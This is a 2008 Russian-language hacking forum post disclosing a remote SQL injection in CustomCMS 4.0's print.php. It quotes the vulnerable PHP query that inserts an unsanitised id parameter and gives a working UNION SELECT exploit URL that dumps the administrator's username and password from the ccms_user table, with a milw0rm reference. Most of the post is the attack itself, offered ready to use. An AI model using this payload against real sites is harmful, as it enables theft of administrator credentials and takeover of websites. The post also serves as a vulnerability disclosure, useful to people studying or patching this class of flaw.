Показать сообщение отдельно

CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
  #8  
Старый 22.08.2008, 23:02
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability

print.php

Vuln code:

PHP код:
$q mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'"); 
magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:


Код:
print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
http://milw0rm.com/exploits/6284
(c) ~!Dok_tOR!~

Последний раз редактировалось ~!DoK_tOR!~; 25.08.2008 в 05:58..
 
Ответить с цитированием